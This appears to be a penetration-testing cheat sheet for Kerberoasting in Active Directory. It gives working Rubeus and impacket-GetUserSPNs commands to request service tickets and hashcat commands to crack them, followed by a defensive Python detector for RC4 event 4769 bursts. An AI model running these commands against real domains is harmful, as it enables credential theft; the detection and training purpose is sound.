Kerberoasting
Type 1: Using Windows and Kali Linux
Type 2: Using only Kali Linux
# Type 1: Using Windows and Kali Linux
# Here we get the service ticket of a service account and then try to recover the clear-text password.
# We will need the Rubeus.exe file. We can download it from the above git repo and then transfer it to the Windows host using SMB or iwr (Invoke-WebRequest).
# Command to perform Kerberoasting using Rubeus (Windows):
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
# After it has finished, the hash is stored in the hashes.kerberoast file. This is only possible if a kerberoastable user is found: "Total kerberoastable users : 1"
# We can then identify the hash type and crack it using hashcat.
# To use hashcat you need to transfer the file to Kali Linux using SMB.
# Example to crack the password:
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

# Type 2: Using only Kali Linux
# Here we get the service ticket of a service account and then try to recover the clear-text password.
# If you have multiple users, check them as well.
# We will use the impacket-GetUserSPNs module for Kerberoasting.
sudo impacket-GetUserSPNs -request -dc-ip $ip_of_dc <Domain_Name>/<Username>:'<password>' -outputfile hashes.kerberoast
# Example: sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete
# "-request" : obtains the TGS tickets and outputs them in a Hashcat-compatible format
# Now we can use hashcat with the proper hash type to crack the hash found.
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
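
The defender's view of both methods above, as an added example that is not part of the original page: each roasted ticket shows up on the domain controller as a Security event 4769 with an RC4 encryption type (0x17, the etype that hashcat mode 13100 targets). The sample events, the account and service names other than `pete`, and the helper names are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23, the ticket type hashcat mode 13100 works on


def _ev(ts, user, svc, etype, ip="::ffff:192.168.50.75", status="0x0"):
    """Build one constructed 4769 record using the event's own field names."""
    return {"EventID": 4769, "TimeCreated": ts, "TargetUserName": user,
            "ServiceName": svc, "TicketEncryptionType": etype,
            "Status": status, "IpAddress": ip}


# Constructed sample data, not real logs.
SAMPLE_EVENTS = [
    _ev("2024-01-10T09:00:01", "pete@CORP.COM", "svc_sql", "0x17"),
    _ev("2024-01-10T09:00:02", "pete@CORP.COM", "svc_web", "0x17"),
    _ev("2024-01-10T09:00:02", "pete@CORP.COM", "svc_backup", "0x17"),
    _ev("2024-01-10T09:01:00", "pete@CORP.COM", "FILES04$", "0x12"),  # machine account, AES
    _ev("2024-01-10T09:05:00", "jen@CORP.COM", "svc_sql", "0x12", ip="::ffff:192.168.50.80"),
    _ev("2024-01-10T10:00:00", "dave@CORP.COM", "svc_sql", "0x17", ip="::ffff:192.168.50.81"),
    _ev("2024-01-10T11:00:00", "dave@CORP.COM", "svc_web", "0x17", ip="::ffff:192.168.50.81"),
]


def is_candidate(ev):
    """True for a successful RC4 service ticket issued for a user-account SPN."""
    if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
        return False
    if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
        return False
    svc = ev["ServiceName"]
    return not svc.endswith("$") and svc.lower() != "krbtgt"


def find_kerberoast_bursts(events, window=timedelta(minutes=5), min_services=2):
    """Map (requester, source IP) to the distinct services it obtained RC4
    tickets for, when at least min_services fall inside one time window."""
    by_requester = defaultdict(list)
    for ev in filter(is_candidate, events):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        by_requester[(ev["TargetUserName"], ev["IpAddress"])].append((ts, ev["ServiceName"]))
    alerts = {}
    for key, hits in by_requester.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            services = {s for t, s in hits[i:] if t - start <= window}
            if len(services) >= min_services:
                alerts[key] = sorted(services)
                break
    return alerts
```

Because a domain may contain only one kerberoastable account (as in the Rubeus output "Total kerberoastable users : 1"), set `min_services=1` where RC4 service tickets are not otherwise expected.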